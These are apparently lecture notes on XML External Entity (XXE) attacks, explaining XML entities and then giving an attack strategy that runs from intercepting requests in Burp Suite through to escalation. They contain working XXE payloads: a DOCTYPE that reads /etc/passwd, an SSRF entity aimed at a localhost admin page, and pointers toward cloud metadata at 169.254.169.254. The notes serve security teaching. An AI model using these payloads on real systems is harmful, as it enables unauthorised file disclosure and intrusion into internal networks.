# XXE Lecture Notes ## 1. Introduction to XML ### What is XML? XML stands for **Extensible Markup Language**, a flexible, structured format designed for storing, transporting, and describing data. It is both human-readable and machine-parseable. ### Core Concepts * **Self-describing data**: XML stores both data and metadata (tags). * **Hierarchical structure**: Similar to HTML, XML documents are nested and tree-like. * **Extensibility**: Unlike HTML, the tags are not predefined; developers create their own tags. * **Used across many industries**: APIs, configuration files, document formats (like Microsoft Office), SVGs, and many legacy websites use XML. ## 2. What is an Entity in XML? ### Definition An **entity** in XML is essentially a **macro or variable** that gets expanded by the XML processor. Entities are defined inside a **DOCTYPE** declaration. There are three major types: 1. **Internal Entities** – Defined inside the document. 2. **External Entities** – Loaded from external resources. 3. **Parameter Entities** – Used within DTDs. ### Internal Entity Example ```xml <!ENTITY message "hello"> ``` Later usage: ```xml <body>&message;</body> ``` This behaves similar to a constant substitution. ### Why Entities Exist Entities originated from SGML (XML’s ancestor). In the early days, they were used to reuse content, include templates, or include text files. Today, they’re mostly unnecessary - but still supported - and therefore dangerous. ## 3. What is an External Entity? ### Definition An **external entity** is an XML entity whose value does not come from the XML document itself, but from an external source—typically: * A file on the server (`file://…`) * A remote URL (`http://…`) * A network share * A custom protocol handler ### **Example (from the slide)** ```xml <!ENTITY xxe SYSTEM "file:///etc/passwd"> ``` This tells the XML parser: “when you expand `&xxe;`, fetch the contents of this external file.” ### **Why is this Dangerous?** If an application: * Accepts user-controlled XML * Uses a parser that allows entity expansion * Echoes back the parsed content or processes it further …then the attacker can force the server to read files and return them. ## **4. How XXE Becomes an Attack** ### **Common Attack Capabilities:** 1. **Local File Disclosure** Read arbitrary server files (`/etc/passwd`, application configs, keys). 2. **Server-Side Request Forgery (SSRF)** External entities can reference URLs. Because the URL is fetched by the remote server itself, it may have more permissions than an outside client would, which is useful if the internal server has special persmissions to access resources. Example: ```xml <!ENTITY xxe SYSTEM "http://localhost:8080/admin"> ``` 3. **Port Scanning / Network Recon** Servers with access to internal networks can be probed via URL-based entities. ## 5. Average Attack Strategy (Expanded) ### 1. Intercept Requests in Burp Suite Use Burp to: * Capture the XML payload the server expects * Identify where injection opportunities exist ### 2. Craft a Malicious Payload Example attack payload for reading files: ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root> ``` ### **3. Test for Responses** * Does the server reflect the entity content in the response? * Does it log somewhere you can see? * Does it process XML further upstream? ### **4. Escalate** If file reads work, try: * SSRF * Enumerating local filesystem * Fetching cloud metadata (e.g., AWS `169.254.169.254`) * Accessing internal admin panels